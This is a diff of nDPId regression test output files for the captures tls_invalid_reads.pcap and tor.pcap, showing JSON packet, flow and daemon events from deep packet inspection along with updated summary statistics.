00381{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":2,"source":"tls_invalid_reads.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":66,"pkt_l4_len":0,"thread_ts_msec":1252380859868,"pkt":"ABy\/OaUlABTRQblQCABFIBA0ZLoAADYGSUrOIT1xwKgKZQG7D3++yAIvc1S1coASFtCGmAAAAgQFtAEBBAIBAwMx"} 00367{"packet_event_id":1,"packet_event_name":"packet","packet_id":2,"source":"tls_invalid_reads.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":66,"pkt_l4_len":0,"thread_ts_msec":1252380859868,"pkt":"ABy\/OaUlABTRQblQCABFIBA0ZLoAADYGSUrOIT1xwKgKZQG7D3++yAIvc1S1coASFtCGmAAAAgQFtAEBBAIBAwMx"}
00225{"basic_event_id":9,"basic_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"thread_id":0,"packet_id":2,"source":"tls_invalid_reads.pcap","alias":"nDPId-test","l4_data_len":32,"global_ts_msec":1252380859884} 00211{"basic_event_id":9,"basic_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":2,"source":"tls_invalid_reads.pcap","alias":"nDPId-test","l4_data_len":32,"global_ts_msec":1252380859884}
00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"tls_invalid_reads.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1252380859884,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1252380859884,"pkt":"ABTRQblQABy\/PaVxCABFAAAoMP9AAIAG8zDAqAplziE9cQ9\/AbtzVLVyvsgCMFAQ+vDjSQAA"} 00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"tls_invalid_reads.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1252380859884,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1252380859884,"pkt":"ABTRQblQABy\/PaVxCABFAAAoMP9AAIAG8zDAqAplziE9cQ9\/AbtzVLVyvsgCMFAQ+vDjSQAA"}
00600{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4,"source":"tls_invalid_reads.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1252380859885,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":156,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":156,"pkt_l4_len":122,"thread_ts_msec":1252380859885,"pkt":"ABTRQblQABy\/OaVxCABFAACOMQBAAIAG8snAqAplziE9cQ9\/AbtzVLVyvsgCMFAY+vBuTgAAFgMBAGEBAABdAwFKpdC7WffXCrqul0rRyqlV7PYgfbDHC7SZ1YAJU4BSeiCCetHfydzbddwggCw2Ef4Y\/Wcmum3i+DV+RW7iw5bCGwAWAAQABQAKAAkAZABiAAMABgATABIAJQAA"} 00600{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4,"source":"tls_invalid_reads.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1252380859885,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":156,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":156,"pkt_l4_len":122,"thread_ts_msec":1252380859885,"pkt":"ABTRQblQABy\/OaVxCABFAACOMQBAAIAG8snAqAplziE9cQ9\/AbtzVLVyvsgCMFAY+vBuTgAAFgMBAGEBAABdAwFKpdC7WffXCrqul0rRyqlV7PYgfbDHC7SZ1YAJU4BSeiCCetHfydzbddwggCw2Ef4Y\/Wcmum3i+DV+RW7iw5bCGwAWAAQABQAKAAkAZABiAAMABgATABIAJQAA"}
00910{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"tls_invalid_reads.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1252380859868,"flow_last_seen":1252380859885,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":102,"flow_tot_l4_payload_len":102,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1252380859885,"l3_proto":"ip4","src_ip":"192.168.10.101","dst_ip":"206.33.61.113","src_port":3967,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} 00910{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"tls_invalid_reads.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1252380859868,"flow_last_seen":1252380859885,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":102,"flow_tot_l4_payload_len":102,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1252380859885,"l3_proto":"ip4","src_ip":"192.168.10.101","dst_ip":"206.33.61.113","src_port":3967,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}}
@@ -14,12 +14,12 @@
00635{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":9,"source":"tls_invalid_reads.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1421985541772,"flow_last_seen":1421985541772,"flow_idle_time":7440000,"flow_min_l4_payload_len":10,"flow_max_l4_payload_len":10,"flow_tot_l4_payload_len":10,"flow_avg_l4_payload_len":10,"midstream":1,"thread_ts_msec":1421985541772,"l3_proto":"ip4","src_ip":"74.80.160.99","dst_ip":"67.217.77.28","src_port":3258,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"}} 00635{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":9,"source":"tls_invalid_reads.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1421985541772,"flow_last_seen":1421985541772,"flow_idle_time":7440000,"flow_min_l4_payload_len":10,"flow_max_l4_payload_len":10,"flow_tot_l4_payload_len":10,"flow_avg_l4_payload_len":10,"midstream":1,"thread_ts_msec":1421985541772,"l3_proto":"ip4","src_ip":"74.80.160.99","dst_ip":"67.217.77.28","src_port":3258,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"}}
00595{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":10,"source":"tls_invalid_reads.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1252380859868,"flow_last_seen":1252380859943,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":851,"flow_tot_l4_payload_len":1431,"flow_avg_l4_payload_len":204,"midstream":0,"thread_ts_msec":1421985541772,"l3_proto":"ip4","src_ip":"192.168.10.101","dst_ip":"206.33.61.113","src_port":3967,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00595{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":10,"source":"tls_invalid_reads.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1252380859868,"flow_last_seen":1252380859943,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":851,"flow_tot_l4_payload_len":1431,"flow_avg_l4_payload_len":204,"midstream":0,"thread_ts_msec":1421985541772,"l3_proto":"ip4","src_ip":"192.168.10.101","dst_ip":"206.33.61.113","src_port":3967,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00481{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":10,"source":"tls_invalid_reads.pcap","alias":"nDPId-test","packets-captured":10,"packets-processed":8,"total-skipped-flows":0,"total-l4-data-len":1441,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":2,"total-detection-updates":1,"total-updates":0,"current-active-flows":1,"total-active-flows":2,"total-idle-flows":1,"total-events-serialized":16,"global_ts_msec":1544035479538} 00481{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":10,"source":"tls_invalid_reads.pcap","alias":"nDPId-test","packets-captured":10,"packets-processed":8,"total-skipped-flows":0,"total-l4-data-len":1441,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":2,"total-detection-updates":1,"total-updates":0,"current-active-flows":1,"total-active-flows":2,"total-idle-flows":1,"total-events-serialized":16,"global_ts_msec":1544035479538}
00463{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":10,"source":"tls_invalid_reads.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":118,"pkt_type":33024,"pkt_l3_offset":18,"pkt_l4_offset":0,"pkt_len":118,"pkt_l4_len":0,"thread_ts_msec":1421985541772,"pkt":"AAAAAAAFYAgQGhx\/gQBsn4EAYAIIAEVoAGDVegAA\/xG3XAruJEAK7vQxCGgIaABMAAAw\/wA8B+zklkUAADyx3UAAQAbcAwq\/ixE23eAt5LgBu\/kVfJ4AAAAAoAL\/\/3GmAAACBAW0BAIICgAUzUMAAAAAAQMDBg=="} 00449{"packet_event_id":1,"packet_event_name":"packet","packet_id":10,"source":"tls_invalid_reads.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":118,"pkt_type":33024,"pkt_l3_offset":18,"pkt_l4_offset":0,"pkt_len":118,"pkt_l4_len":0,"thread_ts_msec":1421985541772,"pkt":"AAAAAAAFYAgQGhx\/gQBsn4EAYAIIAEVoAGDVegAA\/xG3XAruJEAK7vQxCGgIaABMAAAw\/wA8B+zklkUAADyx3UAAQAbcAwq\/ixE23eAt5LgBu\/kVfJ4AAAAAoAL\/\/3GmAAACBAW0BAIICgAUzUMAAAAAAQMDBg=="}
00209{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"thread_id":0,"packet_id":10,"source":"tls_invalid_reads.pcap","alias":"nDPId-test","layer_type":33024,"global_ts_msec":1544035479538} 00195{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"packet_id":10,"source":"tls_invalid_reads.pcap","alias":"nDPId-test","layer_type":33024,"global_ts_msec":1544035479538}
00458{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":11,"source":"tls_invalid_reads.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":118,"pkt_type":33024,"pkt_l3_offset":18,"pkt_l4_offset":0,"pkt_len":118,"pkt_l4_len":0,"thread_ts_msec":1421985541772,"pkt":"AAAAAAAFYAgQGhx\/gQAMn4EAAAIIAEVoAGBxLwAAOxHfqAru9DEK7iRACGgIaABMAAAw\/wA8AABhskUAADwAAEAA5Abp4Dbd4C0Kv4sRAbvkuBpaSBv5FXyfoBJxILDEAAACBAV4BAIICh1e0BYAFM1DAQMDCA=="} 00444{"packet_event_id":1,"packet_event_name":"packet","packet_id":11,"source":"tls_invalid_reads.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":118,"pkt_type":33024,"pkt_l3_offset":18,"pkt_l4_offset":0,"pkt_len":118,"pkt_l4_len":0,"thread_ts_msec":1421985541772,"pkt":"AAAAAAAFYAgQGhx\/gQAMn4EAAAIIAEVoAGBxLwAAOxHfqAru9DEK7iRACGgIaABMAAAw\/wA8AABhskUAADwAAEAA5Abp4Dbd4C0Kv4sRAbvkuBpaSBv5FXyfoBJxILDEAAACBAV4BAIICh1e0BYAFM1DAQMDCA=="}
00209{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"thread_id":0,"packet_id":11,"source":"tls_invalid_reads.pcap","alias":"nDPId-test","layer_type":33024,"global_ts_msec":1544035479721} 00195{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"packet_id":11,"source":"tls_invalid_reads.pcap","alias":"nDPId-test","layer_type":33024,"global_ts_msec":1544035479721}
00737{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":12,"source":"tls_invalid_reads.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":324,"pkt_type":33024,"pkt_l3_offset":18,"pkt_l4_offset":0,"pkt_len":324,"pkt_l4_len":0,"thread_ts_msec":1421985541772,"pkt":"AAAAAAAFYAgQGhx\/gQBsn4EAYAIIAEVoAS7V9AAA\/xG2FAruJEAK7vQxCGgIaAEaAAAw\/wEKB+zklkUAAOux30AAQAbbUgq\/ixE23eAt5LgBu\/kVfJ8aWkgcgBgFWRb9AAABAQgKABTNax1e0BYWAwEAsgEAAK4DA+Jfj3VZ7Se+llOF2hoK\/0SOWa4JB8kGoFPipHXr6zI3AAAowCvALMAvwDAAngCfwAnACsATwBQAMwA5wAfAEQCcAJ0ALwA1AAUA\/wEAAF0AAAAWABQAABFlLmNyYXNobHl0aWNzLmNvbQAXAAAAIwAAAA0AFgAUBgEGAwUBBQMEAQQDAwEDAwIBAgMAEAALuImlL1Y1GeVflD5H40\/GlDV3w0Q4eHATzs15UMvq3bDFbT9WBxf4WY7WsXHZhuEm\/fgNJZccyFnwUKMb"} 00723{"packet_event_id":1,"packet_event_name":"packet","packet_id":12,"source":"tls_invalid_reads.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":324,"pkt_type":33024,"pkt_l3_offset":18,"pkt_l4_offset":0,"pkt_len":324,"pkt_l4_len":0,"thread_ts_msec":1421985541772,"pkt":"AAAAAAAFYAgQGhx\/gQBsn4EAYAIIAEVoAS7V9AAA\/xG2FAruJEAK7vQxCGgIaAEaAAAw\/wEKB+zklkUAAOux30AAQAbbUgq\/ixE23eAt5LgBu\/kVfJ8aWkgcgBgFWRb9AAABAQgKABTNax1e0BYWAwEAsgEAAK4DA+Jfj3VZ7Se+llOF2hoK\/0SOWa4JB8kGoFPipHXr6zI3AAAowCvALMAvwDAAngCfwAnACsATwBQAMwA5wAfAEQCcAJ0ALwA1AAUA\/wEAAF0AAAAWABQAABFlLmNyYXNobHl0aWNzLmNvbQAXAAAAIwAAAA0AFgAUBgEGAwUBBQMEAQQDAwEDAwIBAgMAEAALuImlL1Y1GeVflD5H40\/GlDV3w0Q4eHATzs15UMvq3bDFbT9WBxf4WY7WsXHZhuEm\/fgNJZccyFnwUKMb"}
00209{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"thread_id":0,"packet_id":12,"source":"tls_invalid_reads.pcap","alias":"nDPId-test","layer_type":33024,"global_ts_msec":1544035479768} 00195{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"packet_id":12,"source":"tls_invalid_reads.pcap","alias":"nDPId-test","layer_type":33024,"global_ts_msec":1544035479768}
00589{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":12,"source":"tls_invalid_reads.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1421985541772,"flow_last_seen":1421985541772,"flow_idle_time":7440000,"flow_min_l4_payload_len":10,"flow_max_l4_payload_len":10,"flow_tot_l4_payload_len":10,"flow_avg_l4_payload_len":10,"midstream":1,"thread_ts_msec":1421985541772,"l3_proto":"ip4","src_ip":"74.80.160.99","dst_ip":"67.217.77.28","src_port":3258,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00589{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":12,"source":"tls_invalid_reads.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1421985541772,"flow_last_seen":1421985541772,"flow_idle_time":7440000,"flow_min_l4_payload_len":10,"flow_max_l4_payload_len":10,"flow_tot_l4_payload_len":10,"flow_avg_l4_payload_len":10,"midstream":1,"thread_ts_msec":1421985541772,"l3_proto":"ip4","src_ip":"74.80.160.99","dst_ip":"67.217.77.28","src_port":3258,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00483{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":12,"source":"tls_invalid_reads.pcap","alias":"nDPId-test","packets-captured":12,"packets-processed":8,"total-skipped-flows":0,"total-l4-data-len":1441,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":2,"total-detection-updates":1,"total-updates":0,"current-active-flows":0,"total-active-flows":2,"total-idle-flows":2,"total-events-serialized":24,"global_ts_msec":1544035479768} 00483{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":12,"source":"tls_invalid_reads.pcap","alias":"nDPId-test","packets-captured":12,"packets-processed":8,"total-skipped-flows":0,"total-l4-data-len":1441,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":2,"total-detection-updates":1,"total-updates":0,"current-active-flows":0,"total-active-flows":2,"total-idle-flows":2,"total-events-serialized":24,"global_ts_msec":1544035479768}
~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~
@@ -34,6 +34,6 @@
~~ total memory freed........: 4685702 bytes ~~ total memory freed........: 4685702 bytes
~~ total allocations/frees...: 101158/101158 ~~ total allocations/frees...: 101158/101158
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
~~ json string min len.......: 214 chars ~~ json string min len.......: 200 chars
~~ json string max len.......: 957 chars ~~ json string max len.......: 957 chars
~~ json string avg len.......: 585 chars ~~ json string avg len.......: 578 chars

568
test/results/tor.pcap.out
View File

@@ -1,167 +1,167 @@
00454{"daemon_event_id":1,"daemon_event_name":"init","thread_id":0,"packet_id":0,"source":"tor.pcap","alias":"nDPId-test","max-flows-per-thread":2048,"max-idle-flows-per-thread":64,"tick-resolution":1000,"reader-thread-count":1,"flow-scan-interval":10000,"generic-max-idle-time":600000,"icmp-max-idle-time":120000,"udp-max-idle-time":180000,"tcp-max-idle-time":7560000,"max-packets-per-flow-to-send":3,"max-packets-per-flow-to-process":32,"global_ts_msec":0} 00454{"daemon_event_id":1,"daemon_event_name":"init","thread_id":0,"packet_id":0,"source":"tor.pcap","alias":"nDPId-test","max-flows-per-thread":2048,"max-idle-flows-per-thread":64,"tick-resolution":1000,"reader-thread-count":1,"flow-scan-interval":10000,"generic-max-idle-time":600000,"icmp-max-idle-time":120000,"udp-max-idle-time":180000,"tcp-max-idle-time":7560000,"max-packets-per-flow-to-send":3,"max-packets-per-flow-to-process":32,"global_ts_msec":0}
00461{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"tor.pcap","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-data-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-events-serialized":2,"global_ts_msec":1383821660212} 00461{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"tor.pcap","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-data-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-events-serialized":2,"global_ts_msec":1383821660212}
00345{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":1,"source":"tor.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":60,"pkt_type":38,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":60,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"AYDCAAAA\/lQA2EYhACZCQgMAAAAAAIAAUlQAwqwfAAAAAIAAUlQAwqwfgAMAABQAAgAAAAAAAAAAAAAA"} 00331{"packet_event_id":1,"packet_event_name":"packet","packet_id":1,"source":"tor.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":60,"pkt_type":38,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":60,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"AYDCAAAA\/lQA2EYhACZCQgMAAAAAAIAAUlQAwqwfAAAAAIAAUlQAwqwfgAMAABQAAgAAAAAAAAAAAAAA"}
00191{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"thread_id":0,"packet_id":1,"source":"tor.pcap","alias":"nDPId-test","layer_type":38,"global_ts_msec":1383821660212} 00177{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"packet_id":1,"source":"tor.pcap","alias":"nDPId-test","layer_type":38,"global_ts_msec":1383821660212}
00345{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":2,"source":"tor.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":60,"pkt_type":38,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":60,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"AYDCAAAA\/lQA2EYhACZCQgMAAAAAAIAAUlQAwqwfAAAAAIAAUlQAwqwfgAMAABQAAgAAAAAAAAAAAAAA"} 00331{"packet_event_id":1,"packet_event_name":"packet","packet_id":2,"source":"tor.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":60,"pkt_type":38,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":60,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"AYDCAAAA\/lQA2EYhACZCQgMAAAAAAIAAUlQAwqwfAAAAAIAAUlQAwqwfgAMAABQAAgAAAAAAAAAAAAAA"}
00191{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"thread_id":0,"packet_id":2,"source":"tor.pcap","alias":"nDPId-test","layer_type":38,"global_ts_msec":1383821662212} 00177{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"packet_id":2,"source":"tor.pcap","alias":"nDPId-test","layer_type":38,"global_ts_msec":1383821662212}
00345{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":3,"source":"tor.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":60,"pkt_type":38,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":60,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"AYDCAAAA\/lQA2EYhACZCQgMAAAAAAIAAUlQAwqwfAAAAAIAAUlQAwqwfgAMAABQAAgAAAAAAAAAAAAAA"} 00331{"packet_event_id":1,"packet_event_name":"packet","packet_id":3,"source":"tor.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":60,"pkt_type":38,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":60,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"AYDCAAAA\/lQA2EYhACZCQgMAAAAAAIAAUlQAwqwfAAAAAIAAUlQAwqwfgAMAABQAAgAAAAAAAAAAAAAA"}
00191{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"thread_id":0,"packet_id":3,"source":"tor.pcap","alias":"nDPId-test","layer_type":38,"global_ts_msec":1383821664212} 00177{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"packet_id":3,"source":"tor.pcap","alias":"nDPId-test","layer_type":38,"global_ts_msec":1383821664212}
00572{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":4,"source":"tor.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1383821665420,"flow_last_seen":1383821665420,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1383821665420,"l3_proto":"ip4","src_ip":"192.168.1.252","dst_ip":"91.143.93.242","src_port":51110,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00572{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":4,"source":"tor.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1383821665420,"flow_last_seen":1383821665420,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1383821665420,"l3_proto":"ip4","src_ip":"192.168.1.252","dst_ip":"91.143.93.242","src_port":51110,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4,"source":"tor.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1383821665420,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1383821665420,"pkt":"UlQA2EYhUlQAWul3CABFAAA0A15AAIAGe0DAqAH8W49d8semAbvp\/8nSAAAAAIACIABVtgAAAgQFtAEDAwgBAQQC"} 00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4,"source":"tor.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1383821665420,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1383821665420,"pkt":"UlQA2EYhUlQAWul3CABFAAA0A15AAIAGe0DAqAH8W49d8semAbvp\/8nSAAAAAIACIABVtgAAAgQFtAEDAwgBAQQC"}
00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5,"source":"tor.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1383821665491,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1383821665491,"pkt":"UlQAWul3UlQA2EYhCABFAAA0AABAAC4G0J5bj13ywKgB\/AG7x6b4Wbj86f\/J04ASOQiLRwAAAgQFtAEBBAIBAwMH"} 00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5,"source":"tor.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1383821665491,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1383821665491,"pkt":"UlQAWul3UlQA2EYhCABFAAA0AABAAC4G0J5bj13ywKgB\/AG7x6b4Wbj86f\/J04ASOQiLRwAAAgQFtAEBBAIBAwMH"}
00454{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6,"source":"tor.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1383821665491,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"thread_ts_msec":1383821665491,"pkt":"UlQA2EYhUlQAWul3CABFAAAoA19AAIAGe0vAqAH8W49d8semAbvp\/8nT+Fm4\/VAQAQAEIgAAAAAAAAAA"} 00454{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6,"source":"tor.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1383821665491,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"thread_ts_msec":1383821665491,"pkt":"UlQA2EYhUlQAWul3CABFAAAoA19AAIAGe0vAqAH8W49d8semAbvp\/8nT+Fm4\/VAQAQAEIgAAAAAAAAAA"}
